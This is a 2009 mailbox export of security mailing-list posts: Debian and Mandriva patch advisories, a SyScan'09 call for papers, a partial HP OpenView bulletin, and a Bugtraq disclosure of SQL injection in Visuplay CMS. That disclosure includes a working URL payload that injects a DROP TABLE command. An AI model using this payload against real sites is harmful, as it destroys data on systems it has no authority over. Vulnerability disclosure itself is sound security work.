Resent-Date: Sun, 11 Jan 2009 21:48:57 +0000 (UTC)
Resent-From: list@liszt.debian.org (Mailing List Manager)
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1700-1                  security@debian.org
http://www.debian.org/security/                       Moritz Muehlenhoff
January 11, 2009                      http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : lasso
Vulnerability  : incorrect API usage
Problem type   : local(remote)
Debian-specific: no
CVE Id(s)      : CVE-2009-0050
Debian Bug     : 511262

It was discovered that Lasso, a library for Liberty Alliance and SAML
protocols performs incorrect validation of the return value of OpenSSL's
DSA_verify() function.

For the stable distribution (etch), this problem has been fixed in
version 0.6.5-3+etch1.

For the upcoming stable distribution (lenny) and the unstable
distribution (sid), this problem has been fixed in version 2.2.1-2.

We recommend that you upgrade your lasso package.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- -------------------------------

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/l/lasso/lasso_0.6.5-3+etch1.diff.gz
    Size/MD5 checksum:     7571 1795008d78e35b8e3a098e5f72fabe68
  http://security.debian.org/pool/updates/main/l/lasso/lasso_0.6.5.orig.tar.gz
    Size/MD5 checksum:  1420093 6263375e5910577258a04882b50d58cd
  http://security.debian.org/pool/updates/main/l/lasso/lasso_0.6.5-3+etch1.dsc
    Size/MD5 checksum:     1149 a2975d5f40cc77b4416189c91b640626

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/l/lasso/python-lasso_0.6.5-3+etch1_alpha.deb
    Size/MD5 checksum:   188988 52db78dd66b6ee7af8e952423a5bae69
  http://security.debian.org/pool/updates/main/l/lasso/liblasso-java_0.6.5-3+etch1_alpha.deb
    Size/MD5 checksum:   202066 25f98352704c905d0ec9e50a876eca5b
  http://security.debian.org/pool/updates/main/l/lasso/liblasso3-dev_0.6.5-3+etch1_alpha.deb
    Size/MD5 checksum:   243412 7f7cc9c581abcb282255437e0347a4a5
  http://security.debian.org/pool/updates/main/l/lasso/php4-lasso_0.6.5-3+etch1_alpha.deb
    Size/MD5 checksum:   199052 7846d19823e3f0f3920e225565612241
  http://security.debian.org/pool/updates/main/l/lasso/liblasso3_0.6.5-3+etch1_alpha.deb
    Size/MD5 checksum:   102330 3162bda7c4114d1077de147f74fedca2

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/l/lasso/liblasso-java_0.6.5-3+etch1_amd64.deb
    Size/MD5 checksum:   190932 9d0ad6de3244a13c21ffd9c9f84c84cb
  http://security.debian.org/pool/updates/main/l/lasso/liblasso3_0.6.5-3+etch1_amd64.deb
    Size/MD5 checksum:    96332 3826a242c6c8d970d16947da4f9ebad8
  http://security.debian.org/pool/updates/main/l/lasso/python-lasso_0.6.5-3+etch1_amd64.deb
    Size/MD5 checksum:   197730 2df1a9f5846da409446cf2fe639fdd18
  http://security.debian.org/pool/updates/main/l/lasso/liblasso3-dev_0.6.5-3+etch1_amd64.deb
    Size/MD5 checksum:   181050 33a215818d3127efe4783f6450a65e38
  http://security.debian.org/pool/updates/main/l/lasso/php4-lasso_0.6.5-3+etch1_amd64.deb
    Size/MD5 checksum:   203192 7bf3acad905bc1d1d3db1dc6a2376fb2

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/l/lasso/python-lasso_0.6.5-3+etch1_arm.deb
    Size/MD5 checksum:   160002 98cd9c31a9c5cc6e2d00af6994df275f
  http://security.debian.org/pool/updates/main/l/lasso/php4-lasso_0.6.5-3+etch1_arm.deb
    Size/MD5 checksum:   170136 ffdf6a636e0976dc2453c3c4cdde6148
  http://security.debian.org/pool/updates/main/l/lasso/liblasso3_0.6.5-3+etch1_arm.deb
    Size/MD5 checksum:    79320 b7e55e0058211a978b081d34200b6dd2
  http://security.debian.org/pool/updates/main/l/lasso/liblasso-java_0.6.5-3+etch1_arm.deb
    Size/MD5 checksum:   171604 20252678b9734a661bb9d1de85bcc19f
  http://security.debian.org/pool/updates/main/l/lasso/liblasso3-dev_0.6.5-3+etch1_arm.deb
    Size/MD5 checksum:   162136 27d611c443da457449aae51e1886d850

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/l/lasso/python-lasso_0.6.5-3+etch1_hppa.deb
    Size/MD5 checksum:   205932 81450e57634addeaf1184fbd22e77e8a
  http://security.debian.org/pool/updates/main/l/lasso/php4-lasso_0.6.5-3+etch1_hppa.deb
    Size/MD5 checksum:   196804 115fb72d48047215dde67725977f4776
  http://security.debian.org/pool/updates/main/l/lasso/liblasso3_0.6.5-3+etch1_hppa.deb
    Size/MD5 checksum:   107412 3531a223c7c38a90ad18c1cdb305f056
  http://security.debian.org/pool/updates/main/l/lasso/liblasso-java_0.6.5-3+etch1_hppa.deb
    Size/MD5 checksum:   194800 e76b5149eb02bab77a2748e56b1fa607
  http://security.debian.org/pool/updates/main/l/lasso/liblasso3-dev_0.6.5-3+etch1_hppa.deb
    Size/MD5 checksum:   190720 16abaafbdf73a532c807f4fc08cb826a

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/l/lasso/python-lasso_0.6.5-3+etch1_i386.deb
    Size/MD5 checksum:   166418 105a00318a2b57dea1c3957c976ba73e
  http://security.debian.org/pool/updates/main/l/lasso/php4-lasso_0.6.5-3+etch1_i386.deb
    Size/MD5 checksum:   184638 b4ba5bb2f5d38d3b60493433425c3a11
  http://security.debian.org/pool/updates/main/l/lasso/liblasso-java_0.6.5-3+etch1_i386.deb
    Size/MD5 checksum:   182136 594c2da1dfaea16e7f52245b5eed87aa
  http://security.debian.org/pool/updates/main/l/lasso/liblasso3_0.6.5-3+etch1_i386.deb
    Size/MD5 checksum:    86676 0926b46ed2e93ddf24693fdf61828521
  http://security.debian.org/pool/updates/main/l/lasso/liblasso3-dev_0.6.5-3+etch1_i386.deb
    Size/MD5 checksum:   161366 68f12ada6b09b127957371f95f77df77

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/l/lasso/liblasso-java_0.6.5-3+etch1_ia64.deb
    Size/MD5 checksum:   192958 32455f398eae4f66e7c0826d82e23081
  http://security.debian.org/pool/updates/main/l/lasso/liblasso3-dev_0.6.5-3+etch1_ia64.deb
    Size/MD5 checksum:   216814 b5a48191d251e59687f8b4baeeba19f7
  http://security.debian.org/pool/updates/main/l/lasso/liblasso3_0.6.5-3+etch1_ia64.deb
    Size/MD5 checksum:   121722 50a3c1e995450eb0a0f8150cf02a88d3
  http://security.debian.org/pool/updates/main/l/lasso/php4-lasso_0.6.5-3+etch1_ia64.deb
    Size/MD5 checksum:   266790 311b79245a32bb66b30dceea1cb6d3da
  http://security.debian.org/pool/updates/main/l/lasso/python-lasso_0.6.5-3+etch1_ia64.deb
    Size/MD5 checksum:   216200 ad8b63cede6787ae731aee94d7edab16

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/l/lasso/liblasso3_0.6.5-3+etch1_mips.deb
    Size/MD5 checksum:    78310 70edbabaad959ab6a17b676fe0ea03c6
  http://security.debian.org/pool/updates/main/l/lasso/php4-lasso_0.6.5-3+etch1_mips.deb
    Size/MD5 checksum:   141498 2809cae134e9d1854764975184191798
  http://security.debian.org/pool/updates/main/l/lasso/python-lasso_0.6.5-3+etch1_mips.deb
    Size/MD5 checksum:   135898 0c3e46f010c591e99f56eacf57108940
  http://security.debian.org/pool/updates/main/l/lasso/liblasso-java_0.6.5-3+etch1_mips.deb
    Size/MD5 checksum:   174772 4b6269ed3502850709d2e649aec05851
  http://security.debian.org/pool/updates/main/l/lasso/liblasso3-dev_0.6.5-3+etch1_mips.deb
    Size/MD5 checksum:   183986 4e38bdb6f27ec82719a63b2a47a50a22

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/l/lasso/liblasso3_0.6.5-3+etch1_mipsel.deb
    Size/MD5 checksum:    78006 47ed53cb8c5f3dcd0c60bc6f748629dc
  http://security.debian.org/pool/updates/main/l/lasso/liblasso3-dev_0.6.5-3+etch1_mipsel.deb
    Size/MD5 checksum:   178412 192198be8b38252e0e9c37c84e3f9129
  http://security.debian.org/pool/updates/main/l/lasso/php4-lasso_0.6.5-3+etch1_mipsel.deb
    Size/MD5 checksum:   139602 7d6fba843d9ffbde9c6867e6293b50ef
  http://security.debian.org/pool/updates/main/l/lasso/python-lasso_0.6.5-3+etch1_mipsel.deb
    Size/MD5 checksum:   130842 79d8fdde15e1651da4967c132768ef11
  http://security.debian.org/pool/updates/main/l/lasso/liblasso-java_0.6.5-3+etch1_mipsel.deb
    Size/MD5 checksum:   173854 a4217a9f17adae1ddb4d1e9002fecb43

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/l/lasso/php4-lasso_0.6.5-3+etch1_powerpc.deb
    Size/MD5 checksum:   196058 38b56e6e3ddc7f56567c74ec643fec81
  http://security.debian.org/pool/updates/main/l/lasso/liblasso-java_0.6.5-3+etch1_powerpc.deb
    Size/MD5 checksum:   177630 f528eb20a85f706ab9f3f3758f9414f4
  http://security.debian.org/pool/updates/main/l/lasso/liblasso3_0.6.5-3+etch1_powerpc.deb
    Size/MD5 checksum:    87580 87cc0b0cb0f50f80ac0d6a75d3cbb5a5
  http://security.debian.org/pool/updates/main/l/lasso/liblasso3-dev_0.6.5-3+etch1_powerpc.deb
    Size/MD5 checksum:   157740 aba541317a5ea52fc2a9a17e14e96db7
  http://security.debian.org/pool/updates/main/l/lasso/python-lasso_0.6.5-3+etch1_powerpc.deb
    Size/MD5 checksum:   183172 c179334bd068ed62b5453b88b982eeb5

s390 architecture (IBM S/390)

  http://security.debian.org/pool/updates/main/l/lasso/php4-lasso_0.6.5-3+etch1_s390.deb
    Size/MD5 checksum:   162292 891dc34494011b354427ff7797a41e24
  http://security.debian.org/pool/updates/main/l/lasso/liblasso-java_0.6.5-3+etch1_s390.deb
    Size/MD5 checksum:   190198 706bb4e0969bcc6c3b273dc9344c7da4
  http://security.debian.org/pool/updates/main/l/lasso/python-lasso_0.6.5-3+etch1_s390.deb
    Size/MD5 checksum:   161716 711db09fd4150bc1f068f5b5fb1e9dbf
  http://security.debian.org/pool/updates/main/l/lasso/liblasso3_0.6.5-3+etch1_s390.deb
    Size/MD5 checksum:    96562 157be6e89308bfbf1bb53e30e4d0d8da
  http://security.debian.org/pool/updates/main/l/lasso/liblasso3-dev_0.6.5-3+etch1_s390.deb
    Size/MD5 checksum:   175634 706adfdb4bc526064399360616de2007

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/l/lasso/php4-lasso_0.6.5-3+etch1_sparc.deb
    Size/MD5 checksum:   179674 09b871dbcaeaf3108bd6860c2fc81363
  http://security.debian.org/pool/updates/main/l/lasso/liblasso3_0.6.5-3+etch1_sparc.deb
    Size/MD5 checksum:    88132 f2fd28ccab190a99e2398725e4fd8b90
  http://security.debian.org/pool/updates/main/l/lasso/liblasso-java_0.6.5-3+etch1_sparc.deb
    Size/MD5 checksum:   173448 5e1fa2fe243214d922308bf324da7e87
  http://security.debian.org/pool/updates/main/l/lasso/liblasso3-dev_0.6.5-3+etch1_sparc.deb
    Size/MD5 checksum:   170024 4b80b359d3a1150818c50d92eaa37c5b
  http://security.debian.org/pool/updates/main/l/lasso/python-lasso_0.6.5-3+etch1_sparc.deb
    Size/MD5 checksum:   181308 db23cb9d622527c4032d8a98865b828f


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEARECAAYFAklqaMQACgkQXm3vHE4uylo0/wCg55JaJ9uBKz7/6BHVxqFQr6qs
ggcAn0vx2xkAYwHnCNM0nCjwMW/bCgMW
=4obR
-----END PGP SIGNATURE-----

From - Mon Jan 12 13:41:46 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00005890
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39128-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id DDF94ECE0D
for <lists@securityspace.com>; Mon, 12 Jan 2009 13:35:17 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 847262374D7; Mon, 12 Jan 2009 08:55:24 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 32625 invoked from network); 12 Jan 2009 02:57:19 -0000
X-Cloudmark-SP-Filtered: true
X-Cloudmark-SP-Result: v=1.0 c=0 a=FLhA3KDuAAAA:8 a=sMBj6sIwAAAA:8 aTS9BPTUW2ai8pWGhkA:9 a=9p6UsBgfEB0Zs2kH97kA:7 a=s64v_Mu4zk5dHPbZALAtqYnAeGgA:4 a=PRHNZNJDFyAA:10 a=R2VQutpenNgA:10 a=8UiCvUyRy1oA:10
To: bugtraq@securityfocus.com
Subject: [ MDVSA-2009:005 ] xterm
Date: Sun, 11 Jan 2009 20:27:00 -0700
From: security@mandriva.com
Reply-To: <xsecurity@mandriva.com>
Message-Id: <E1LMDS8-0001Wc-8z@titan.mandriva.com>
Status:   


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2009:005
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : xterm
 Date    : January 11, 2009
 Affected: 2008.0, 2008.1, 2009.0, Corporate 3.0, Corporate 4.0
 _______________________________________________________________________

 Problem Description:

 A vulnerability has been discovered in xterm, which can be exploited
 by malicious people to compromise a user's system. The vulnerability
 is caused due to xterm not properly processing the DECRQSS Device
 Control Request Status String escape sequence. This can be exploited
 to inject and execute arbitrary shell commands by e.g. tricking a
 user into displaying a malicious text file containing a specially
 crafted escape sequence via the more command in xterm (CVE-2008-2383).
 
 The updated packages have been patched to prevent this.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2383
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2008.0:
 0afcdb50028ef42a65de6d144aa132e0  2008.0/i586/xterm-229-2.1mdv2008.0.i586.rpm 
 4ab46d69ae67182b660d9d876b2d7d4a  2008.0/SRPMS/xterm-229-2.1mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 0edc195a66de717de16ce187bdb52605  2008.0/x86_64/xterm-229-2.1mdv2008.0.x86_64.rpm 
 4ab46d69ae67182b660d9d876b2d7d4a  2008.0/SRPMS/xterm-229-2.1mdv2008.0.src.rpm

 Mandriva Linux 2008.1:
 42985a0486e1bea3196576216dc29fff  2008.1/i586/xterm-232-1.1mdv2008.1.i586.rpm 
 7ae405602b65a1fc1e53ce7b9619ea4c  2008.1/SRPMS/xterm-232-1.1mdv2008.1.src.rpm

 Mandriva Linux 2008.1/X86_64:
 8b3dc6fb6c25034b47094c2895244f52  2008.1/x86_64/xterm-232-1.1mdv2008.1.x86_64.rpm 
 7ae405602b65a1fc1e53ce7b9619ea4c  2008.1/SRPMS/xterm-232-1.1mdv2008.1.src.rpm

 Mandriva Linux 2009.0:
 eb3c38a51326b1eafb5d0ad6f4e73ddb  2009.0/i586/xterm-236-1.1mdv2009.0.i586.rpm 
 0852446a157588e61c85ce589d140b7f  2009.0/SRPMS/xterm-236-1.1mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 33aa6e252961cfa84aa243f4654bd0b7  2009.0/x86_64/xterm-236-1.1mdv2009.0.x86_64.rpm 
 0852446a157588e61c85ce589d140b7f  2009.0/SRPMS/xterm-236-1.1mdv2009.0.src.rpm

 Corporate 3.0:
 60f0250c17212cf80c5e81e0ba4f5b82  corporate/3.0/i586/xterm-184-1.1.C30mdk.i586.rpm 
 8674b5ce234d367814905944cbbb48a6  corporate/3.0/SRPMS/xterm-184-1.1.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 05b5a40265d8a5a9f6da03af5920252a  corporate/3.0/x86_64/xterm-184-1.1.C30mdk.x86_64.rpm 
 8674b5ce234d367814905944cbbb48a6  corporate/3.0/SRPMS/xterm-184-1.1.C30mdk.src.rpm

 Corporate 4.0:
 3f8bb08944785f50ab189fdc9af829e1  corporate/4.0/i586/xterm-203-1.1.20060mlcs4.i586.rpm 
 dff8e15cc4fd01732ca2097b2bc4731d  corporate/4.0/SRPMS/xterm-203-1.1.20060mlcs4.src.rpm

 Corporate 4.0/X86_64:
 7da181fbf15239e44b4f887e1bbbcc03  corporate/4.0/x86_64/xterm-203-1.1.20060mlcs4.x86_64.rpm 
 dff8e15cc4fd01732ca2097b2bc4731d  corporate/4.0/SRPMS/xterm-203-1.1.20060mlcs4.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFJaolWmqjQ0CJFipgRAukIAKDpdq6oMsL8hv/l7f3E0LMz1KdGMACePjzG
mu4NY4xULs9opis9QPwh9lM=Mg0S
-----END PGP SIGNATURE-----

From - Mon Jan 12 13:51:46 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00005891
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39129-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 1A260ECE0D
for <lists@securityspace.com>; Mon, 12 Jan 2009 13:44:41 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 4A7762374DE; Mon, 12 Jan 2009 08:55:58 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 8001 invoked from network); 12 Jan 2009 09:41:53 -0000
Message-ID: <496B15B6.8000704@syscan.org>
Date: Mon, 12 Jan 2009 18:04:38 +0800
From: "organiser@syscan.org" <organiser@syscan.org>
User-Agent: Thunderbird 2.0.0.19 (Windows/20081209)
MIME-Version: 1.0
To: dailydave <dailydave@lists.immunitysec.com>,
bugtraq@securityfocus.com, oss-security@lists.openwall.com,
focus-ids@securityfocus.com, webappsec@securityfocus.org,
isn@infosecnews.org, honeypots@securityfocus.com,
incidents@securityfocus.com, Focus-Linux@securityfocus.com,
pen-test@securityfocus.com, security-basics@securityfocus.com,
security-announce@globus.org, linux-security@redhat.com,
sectool-list@redhat.com, compsci@lists.free.net.ph
Cc: "organiser@syscan.org" <organiser@syscan.org>
Subject: SyScan'09 Call For Paper - Shanghai, Hong Kong, Singapore, Taipei
Content-Type: text/plain; charset=windows-1252; format=flowed
Content-Transfer-Encoding: 8bit
Status:   

*SyScan'09 CALL FOR PAPERS/TRAINING*

*ABOUT SYSCAN'09*
This year, SyScan'09 will be held in the 4 exciting cities of Singapore, 
Shanghai, Taipei and Hong Kong. Details are as follows:

*/SyScan'09 /**/Shanghai/**/
/*date: 13, 14 May 2009
venue: Ramada Plaza Hotel Shanghai

*/SyScan'09 /**/Hong Kong/**/
/*date: 19, 20 May 2009
venue: Langham Place Hotel

*/SyScan'09 /**/Singapore/**/
/*date: 2, 3 July 2009
venue: Novotel Clarke Quay Hotel

*/SyScan'09 /**/Taipei/**/
/*date: 7, 8 July 2009
venue: NTUH International Convention Center

*CFP COMMITTEE *
The Call for Papers committee for SyScan�09 comprises of the following 
personnel:

1. Thomas Lim � Organiser of SyScan and CEO of COSEINC
2. Dave Aitel � Founder and CTO of Immunitysec
3. Marc Maiffret � Ex-Founder and Chief Hacking Officer of eEye
4. Matthew �Shok� Conover � Symantec

The CFP committee will review all submissions and determine the final 
list of speakers for SyScan�09.

*CONFERENCE TOPICS *
The focus for SyScan�09 will include the following:

*Operating Systems *
� Vista
� Linux
*Mobile Devices/Embedded systems *
� SmartPhones
� PDAs
� Game Consoles
*Web 2.0 *
� Web services
� PHP
� .Net/.asp
� Web applications
*Networking/Telecommunication *
� VoIP
� 3G/3.5G network
� IPv6
� WLAN/WiFi
� GPRS
*New Technologies*
� Chrome
� IE8
� Android
� iPhone
*Virtualization *
*Malware/Rootkits
BotNets
Security Policy/Best Practices
Legislation*
*Any topics that will catch the attention of the CFP committee and/or 
the world. *

*TRAINING TOPICS *
SyScan�09 training topics will focus on the following areas:

*Web Applications *
*Networks *
*Securing Windows/Linux Systems *
*Databases
Storage
Secure Programming/Development
*
*PRIVILEGES *
Speakers� Privileges:
� Return economy class air-ticket for one person.
� 3 nights of accommodation.
� Breakfast, lunch and dinner during conference.
� After-conference party.
� A very healthy dose of alcohol and fun.
� S$500 cash for speakers with brand new presentations.

Trainers� Privileges:
� 50% of net profit of class.
� 2 nights of accommodation (conference) (applicable for Singapore only).
� After-conference party.
� A very healthy dose of alcohol and fun.

Please note that the net profit for each class is determined by the 
difference between the total fee collected for each class and the total 
expenses incurred for each class. The expenses of each class would 
include the return economy air-ticket of the trainer, 3 nights of 
accommodation (training) and the rental of the training venue.


*CFP SUBMISSION*
CFP submission must include the following information:

1) Brief biography including list of publications and papers published 
previously or training classes conducted previously.
2) Proposed presentation/training title, category, synopsis and 
description.
3) Contact Information (full name, alias, handler, e-mail, postal 
address, phone, fax, photo, country of origin, special dietary 
requirement).
4) Employment and/or affiliations information.
5) Any significant presentation and educational/training 
experience/background.
6) Why is your material different or innovative or significant or an 
important tutorial?

Please note that all speakers will be allocated 50 minutes of 
presentation time. Any speakers that require more time must inform the 
CFP committee during the CFP submission.

Training classes will be 2 full days. Please inform the CFP committee if 
your class is shorter or longer than 2 days during your CFP submission.

All submissions must be in English and in PDF format only. The more 
information you provide, the better the chance for selection. Please 
send submission to cfp@syscan.org.


*IMPORTANT DATES *
*Shanghai*
Final CFP Submission � 28th February 2009.
Notification of Acceptance � 16th March 2009.
Final Submission for Accepted Presentation Material (Speakers) � 15th 
April 2009

*Hong Kong*
Final CFP Submission � 28th February 2009.
Notification of Acceptance � 16th March 2009.
Final Submission for Accepted Presentation Material (Speakers) � 15th 
April 2009.

*Singapore*
Final CFP Submission � 31st March 2009.
Notification of Acceptance � 15th April 2009.
Final Submission for Accepted Presentation Material (Speakers) � 8th May 
2009.

*Taipei*
Final CFP Submission � 31st March 2009.
Notification of Acceptance � 15th April 2009.
Final Submission for Accepted Presentation Material (Speakers) � 8th May 
2009.


*OTHER INFORMATION *
Please feel free to visit SyScan website to get a feel what this 
conference is all about � SHARE AND HAVE FUN!

By agreeing to speak at the SyScan'09 you are granting Syscan Pte. Ltd. 
the rights to reproduce, distribute, advertise and show your 
presentation including but not limited to http://www.syscan.org, printed 
and/or electronic advertisements, and all other mediums.

-- 
Thank you
Thomas Lim
Organiser
SyScan'09
www.syscan.org

From - Mon Jan 12 14:01:46 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00005892
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39130-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 9CF18ECE0D
for <lists@securityspace.com>; Mon, 12 Jan 2009 13:54:00 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id D033D2374DD; Mon, 12 Jan 2009 08:56:27 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 9143 invoked from network); 12 Jan 2009 10:58:31 -0000
Date: Mon, 12 Jan 2009 04:03:05 -0700
Message-Id: <200901121103.n0CB357Z006723@www3.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.420 (Entity 5.420)
From: joseph.giron13@gmail.com
To: bugtraq@securityfocus.com
Subject: Visuplay CMS SQL injection vulnerability
Status:   

http://www.visuplay.com

Visuplay is a web dev company that offers a CMS that goes with its websites that helps it be managed (after all, that Is what a cms does right?)

Anywho, you can add your own sql code to various query areas through out the CMS like news_article.php and content_page.php. Here's an example that seems to work:
http://www.example.com/html/news_article.php?press_id=1;DROP%20table%20news;--&nav_id=7

As stated in the URL, this will drop the news table, but other stuff can be done no doubt. They even run the CMS on their own site, so I wouldn't be surprised if it were vulnerable as well. 

I emailed the devs, and am awaiting a response. Happy hacking!

From - Mon Jan 12 14:11:46 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00005893
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39137-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id D2A64EC547
for <lists@securityspace.com>; Mon, 12 Jan 2009 14:05:31 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 221A8236FDE; Mon, 12 Jan 2009 11:20:47 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 26068 invoked from network); 12 Jan 2009 17:54:40 -0000
To: bugtraq@securityfocus.com
From: security-alert@hp.com
Subject: [security bulletin] HPSBMA02392 SSRT071481 rev.1 - HP OpenView Network Node Manager (OV NNM), Remote Denial of Service (DoS)
Date: Mon, 12 Jan 2009 10:17:50 -0800
Sender: secure@hpchs.cup.hp.com
Message-Id: <20090112181756.3EC7EBE6D@hpchs.cup.hp.com>
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c01607558
Version: 1

HPSBMA02392 SSRT071481 rev.1 - HP OpenView Network Node Manager (OV NNM), Remote Denial of Service (DoS)

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2009-01-12
Last Updated: 2009-01-12

Potential Security Impact: Remote Denial of Service (DoS)

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP OpenView Network Node Manager (OV NNM). The vulnerability could be exploited remotely to create a Denial of Service (DoS).

References: CVE-2007-4349

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP OpenView Network Node Manager (OV NNM) v7.01, v7.51, v7.53 running on HP-UX, Linux, Solaris, and Windows

BACKGROUND

CVSS 2.0 Base Metrics 
==============================================Reference                         Base Vector               Base Score 
CVE-2007-4349     (AV:N/AC:M/Au:N/C:N/I:N/A:P)      4.3
